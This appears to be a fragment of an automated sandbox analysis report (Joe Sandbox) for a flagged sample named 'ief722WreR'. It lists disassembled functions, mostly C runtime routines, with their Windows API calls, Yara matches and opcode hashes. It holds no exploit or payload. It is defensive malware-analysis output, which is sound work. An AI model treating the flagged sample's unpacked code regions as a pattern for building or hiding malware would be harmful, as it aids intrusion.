                                                      • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 3864826663-0
                                                      • Opcode ID: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                      • Instruction ID: 93f6329b7fe105f45c70b5aed5e0df07748c8d3fe3b6be6f44c821e7de56536e
                                                      • Opcode Fuzzy Hash: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                      • Instruction Fuzzy Hash: 5851F472610216AFDB258F71CE41EAF77A9EB48B54F14522AFD04D7280DBBCDC40C698
                                                      APIs
                                                        • Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
                                                        • Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
                                                        • Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9
                                                      • _free.LIBCMT ref: 024B1444
                                                      • _free.LIBCMT ref: 024B145D
                                                      • _free.LIBCMT ref: 024B148F
                                                      • _free.LIBCMT ref: 024B1498
                                                      • _free.LIBCMT ref: 024B14A4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorLast
                                                      • String ID: C
                                                      • API String ID: 3291180501-1037565863
                                                      • Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                      • Instruction ID: 4bf953046ae8e99d889f96c5396d38a94d44d558edc225a5407ee5812131ea11
                                                      • Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                      • Instruction Fuzzy Hash: AAB12775A012199BDB26DF29C894BEEB7B5FF08304F1445AAD80DA7350E770AE90CF50
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                      • Instruction ID: bfd9ead29151d2877f631d1061df4e601ee651aa38b3335c59b440bd117a4214
                                                      • Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                      • Instruction Fuzzy Hash: 9361F171900205AFDB20DF69C842B9EBBF4EB08710F14516BE884EB382E7399D41CB59
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                      • Instruction ID: 0b74a76594ba4baed379928a0c5dab0215b6a522704d77e73e38190dbbe0bcf9
                                                      • Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                      • Instruction Fuzzy Hash: 3E61D171D00215AFDB26CFA9C841BDABBF6EF48710F2441ABE844EB341D771A981CB60
                                                      APIs
                                                      • GetConsoleCP.KERNEL32(?,0042C23D,E0830C40,?,?,?,?,?,?,00433FF8,0040DDD5,0042C23D,?,0042C23D,0042C23D,0040DDD5), ref: 004338C5
                                                      • __fassign.LIBCMT ref: 00433940
                                                      • __fassign.LIBCMT ref: 0043395B
                                                      • WideCharToMultiByte.KERNEL32(?,00000000,0042C23D,00000001,?,00000005,00000000,00000000), ref: 00433981
                                                      • WriteFile.KERNEL32(?,?,00000000,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339A0
                                                      • WriteFile.KERNEL32(?,0040DDD5,00000001,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339D9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                      • String ID:
                                                      • API String ID: 1324828854-0
                                                      • Opcode ID: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
                                                      • Instruction ID: 0964c92a74c3400c6cb4ab9b4b67413798647f05f85f7adc4f4dadb846cf7038
                                                      • Opcode Fuzzy Hash: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
                                                      • Instruction Fuzzy Hash: 3451C271E00209AFDB10DFA8D885BEEBBF4EF09301F14412BE556E7291E7749A41CB69
                                                      APIs
                                                      • GetConsoleCP.KERNEL32(?,024AC4A4,E0830C40,?,?,?,?,?,?,024B425F,0248E03C,024AC4A4,?,024AC4A4,024AC4A4,0248E03C), ref: 024B3B2C
                                                      • __fassign.LIBCMT ref: 024B3BA7
                                                      • __fassign.LIBCMT ref: 024B3BC2
                                                      • WideCharToMultiByte.KERNEL32(?,00000000,024AC4A4,00000001,?,00000005,00000000,00000000), ref: 024B3BE8
                                                      • WriteFile.KERNEL32(?,?,00000000,024B425F,00000000,?,?,?,?,?,?,?,?,?,024B425F,0248E03C), ref: 024B3C07
                                                      • WriteFile.KERNEL32(?,0248E03C,00000001,024B425F,00000000,?,?,?,?,?,?,?,?,?,024B425F,0248E03C), ref: 024B3C40
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                      • String ID:
                                                      • API String ID: 1324828854-0
                                                      • Opcode ID: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
                                                      • Instruction ID: 304ffd4f9296eaba08644137e6ec93464c4e4940ae2de905874f064e7a01c169
                                                      • Opcode Fuzzy Hash: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
                                                      • Instruction Fuzzy Hash: 1651E475900208AFDB11CFA9D884AEEBBF4EF09701F1441AFE555E7291E7309A81CF60
                                                      APIs
                                                      • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 024A4ACD
                                                        • Part of subcall function 024A4D9C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,024A4800), ref: 024A4DAC
                                                      • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 024A4AE2
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 024A4AF1
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024A4AFF
                                                      • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 024A4B75
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 024A4BB5
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024A4BC3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                      • String ID:
                                                      • API String ID: 3151764488-0
                                                      • Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                      • Instruction ID: c7ce8f428c2cfad80e7a49426ad3e0874cbc2eccb3bb0d8ae1723269abb717b2
                                                      • Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                      • Instruction Fuzzy Hash: D331B439A002149BCF04EF69C8A1B6EB3B6FF54710F20456BD9159B381DBB0EA05CB94
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                      • Instruction ID: 860e752c6eb2c716a5d855c3c03ea0c0e6c73714a276bf2c7701abe861d4aafe
                                                      • Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                      • Instruction Fuzzy Hash: 51113A72A00216BFD7206FB7AC04F6B7B6CEF8A735F10123BF815C7240DA3889048669
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                      • Instruction ID: 3d909a4b5b6762711c542bdc472c1f88c6bdb8b3e6dd532265786691cd7f5b8a
                                                      • Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                      • Instruction Fuzzy Hash: 0011D631604115BBDB222F77CC589AB7A6DFF82B21B110A2BFC19C7240DB308885CAB0
                                                      APIs
                                                        • Part of subcall function 0043A0CA: _free.LIBCMT ref: 0043A0F3
                                                      • _free.LIBCMT ref: 0043A3D1
                                                        • Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                        • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                      • _free.LIBCMT ref: 0043A3DC
                                                      • _free.LIBCMT ref: 0043A3E7
                                                      • _free.LIBCMT ref: 0043A43B
                                                      • _free.LIBCMT ref: 0043A446
                                                      • _free.LIBCMT ref: 0043A451
                                                      • _free.LIBCMT ref: 0043A45C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                      • Instruction ID: 8be3f6aa1696d7c36a68609bae5c6e68c8e713719265dd61fa4e844ff8b4370f
                                                      • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                      • Instruction Fuzzy Hash: C611B472581B04A6E531BF72CC0BFCB77AD6F18305F40581EB6DA7B052CA2CB5144B46
                                                      APIs
                                                        • Part of subcall function 024BA331: _free.LIBCMT ref: 024BA35A
                                                      • _free.LIBCMT ref: 024BA638
                                                        • Part of subcall function 024B36D1: HeapFree.KERNEL32(00000000,00000000,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?), ref: 024B36E7
                                                        • Part of subcall function 024B36D1: GetLastError.KERNEL32(?,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?,?), ref: 024B36F9
                                                      • _free.LIBCMT ref: 024BA643
                                                      • _free.LIBCMT ref: 024BA64E
                                                      • _free.LIBCMT ref: 024BA6A2
                                                      • _free.LIBCMT ref: 024BA6AD
                                                      • _free.LIBCMT ref: 024BA6B8
                                                      • _free.LIBCMT ref: 024BA6C3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                      • Instruction ID: 082890d3969e0dbd7c6e4566ddb332ede1ee3d406a60d49ca7e7f1856f658f1b
                                                      • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                      • Instruction Fuzzy Hash: E1115171644B14AADE32BBB3CC45FCF7BDEDF00B00F40082FA299AA150DAA5B5145E60
                                                      APIs
                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412400
                                                      • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412406
                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412433
                                                      • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041243D
                                                      • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041244F
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412465
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00412473
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                      • String ID:
                                                      • API String ID: 4227777306-0
                                                      • Opcode ID: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                      • Instruction ID: 91daacb073e6275429519e5223cc2729029c874a602b9c25603bfcabc23aa3f5
                                                      • Opcode Fuzzy Hash: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                      • Instruction Fuzzy Hash: 4001F734600121ABC714AF66ED0ABEF3768AF42B56B60042BF905E2161DBACDA54866D
                                                      APIs
                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,02490DA0,?,?,?,00000000), ref: 02492667
                                                      • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02490DA0,?,?,?,00000000), ref: 0249266D
                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,02490DA0,?,?,?,00000000), ref: 0249269A
                                                      • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02490DA0,?,?,?,00000000), ref: 024926A4
                                                      • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02490DA0,?,?,?,00000000), ref: 024926B6
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024926CC
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024926DA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                      • String ID:
                                                      • API String ID: 4227777306-0
                                                      • Opcode ID: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                      • Instruction ID: faecae0fd15cc66c1acda4ae3ac3027a44ce648a615dc82bfdd9fbbbbd9a7793
                                                      • Opcode Fuzzy Hash: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                      • Instruction Fuzzy Hash: 9A018435501115BBDB24FF66EC48FAF3F6DAF42F52B50042BF905D2560DBA4DD048AA8
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0249670B), ref: 024924B6
                                                      • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024924C4
                                                      • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024924D2
                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0249670B), ref: 02492500
                                                      • GetProcAddress.KERNEL32(00000000), ref: 02492507
                                                      • GetLastError.KERNEL32(?,?,?,0249670B), ref: 02492522
                                                      • GetLastError.KERNEL32(?,?,?,0249670B), ref: 0249252E
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02492544
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02492552
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                      • String ID: kernel32.dll
                                                      • API String ID: 4179531150-1793498882
                                                      • Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                      • Instruction ID: bb165416997f65df04b4a2a0e5298a38b4ae3f5dbf9295b6d20412f9f6192be1
                                                      • Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                      • Instruction Fuzzy Hash: 5DF086769003103FBB117B757C9991B3FADDD46B32310062BF811E2291EBB589018A58
                                                      APIs
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C677
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throw
                                                      • String ID: F(@$F(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                      • API String ID: 2005118841-3619870194
                                                      • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                      • Instruction ID: df443d8f91edbbbc86da8982951f5297a94925b32ed328c00139598aac834c40
                                                      • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                      • Instruction Fuzzy Hash: FAF0FC72900204AAC714D754CC42FAF33545B11305F14867BED42B61C3EA7EA945C79C
                                                      APIs
                                                        • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                      • _memcmp.LIBVCRUNTIME ref: 0043116C
                                                      • _free.LIBCMT ref: 004311DD
                                                      • _free.LIBCMT ref: 004311F6
                                                      • _free.LIBCMT ref: 00431228
                                                      • _free.LIBCMT ref: 00431231
                                                      • _free.LIBCMT ref: 0043123D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorLast$_memcmp
                                                      • String ID:
                                                      • API String ID: 4275183328-0
                                                      • Opcode ID: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
                                                      • Instruction ID: 3f2797ad77f757c3ae12916b07ca9a57840cbe3c0d6446731fa2169183c3460f
                                                      • Opcode Fuzzy Hash: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
                                                      • Instruction Fuzzy Hash: 57B13975A016199FDB24DF18C884AAEB7B4FF48314F1086EEE909A7360D775AE90CF44
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,024B25EC,00000001,00000001,?), ref: 024B23F5
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,024B25EC,00000001,00000001,?,?,?,?), ref: 024B247B
                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 024B2575
                                                      • __freea.LIBCMT ref: 024B2582
                                                        • Part of subcall function 024B390E: RtlAllocateHeap.NTDLL(00000000,0248DAD7,00000000), ref: 024B3940
                                                      • __freea.LIBCMT ref: 024B258B
                                                      • __freea.LIBCMT ref: 024B25B0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1414292761-0
                                                      • Opcode ID: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
                                                      • Instruction ID: b22284ccdf18279aa4bd1f70a91a509e7ccba57689c2f60cee963e24ae1c1c48
                                                      • Opcode Fuzzy Hash: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
                                                      • Instruction Fuzzy Hash: 4C51F272A10216ABDB26CF64CC60EEF77AAEF44754F154A2AFC04DA240DBB4DD41CA70
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __cftoe
                                                      • String ID:
                                                      • API String ID: 4189289331-0
                                                      • Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                      • Instruction ID: dfd613974eeed67c34c02fdc6c50891be6922ed9c2229ea5b5d628f82eef36e0
                                                      • Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                      • Instruction Fuzzy Hash: 37510832A00205ABDF259FA9DC50BAF77ADEF68334F54427FE825D6281EB31D5018A64
                                                      APIs
                                                      • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 024A3051
                                                        • Part of subcall function 02498AB2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 02498ABD
                                                      • SafeSQueue.LIBCONCRT ref: 024A306A
                                                      • Concurrency::location::_Assign.LIBCMT ref: 024A312A
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 024A314B
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024A3159
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                      • String ID:
                                                      • API String ID: 3496964030-0
                                                      • Opcode ID: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
                                                      • Instruction ID: db7712c667c082d4243ddbbeb187c6e01706e21f0237bee865d658359b1ef492
                                                      • Opcode Fuzzy Hash: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
                                                      • Instruction Fuzzy Hash: 6231DF31A046119FCB25EF69C864BAABBB1FF54710F10859ED9068B255EB70E945CFC0
                                                      APIs
                                                      • FindSITargetTypeInstance.LIBVCRUNTIME ref: 024A8F77
                                                      • FindMITargetTypeInstance.LIBVCRUNTIME ref: 024A8F90
                                                      • FindVITargetTypeInstance.LIBVCRUNTIME ref: 024A8F97
                                                      • PMDtoOffset.LIBCMT ref: 024A8FB6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FindInstanceTargetType$Offset
                                                      • String ID:
                                                      • API String ID: 1467055271-0
                                                      • Opcode ID: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
                                                      • Instruction ID: d9fb731b62fc149d879936de6bcaf1d26b29541b32e671e4603a36899cb79b6a
                                                      • Opcode Fuzzy Hash: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
                                                      • Instruction Fuzzy Hash: D82138726042069FDF14DF69DC55AAE77A6EF64754B10821FF91293280E731E941CE90
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                      • String ID:
                                                      • API String ID: 1687354797-0
                                                      • Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                      • Instruction ID: f7529a1dacc1a483d70a761c0b941259b6dc09c63a052464892f94b3f8ea3335
                                                      • Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                      • Instruction Fuzzy Hash: 9021A071C21208AADF01FBF9D840BDEBBF9AF09325F54401FE104B7280DB749A448E25
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,DB71353F), ref: 00428DE8
                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DF6
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E0F
                                                      • SetLastError.KERNEL32(00000000,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,DB71353F), ref: 00428E61
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastValue___vcrt_
                                                      • String ID:
                                                      • API String ID: 3852720340-0
                                                      • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                      • Instruction ID: 8d354f8c373550ad8ca54886775f1e1f72959a5719103f68ef850459183cda9d
                                                      • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                      • Instruction Fuzzy Hash: 5801283630A7316EA7242BF57C8956F2744EB0677ABA0033FF414913E2EF194C21950D
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,024A9038,024A69C9,024C0907,00000008,024C0C6C,?,?,?,?,024A3CB2,?,?,0045A064), ref: 024A904F
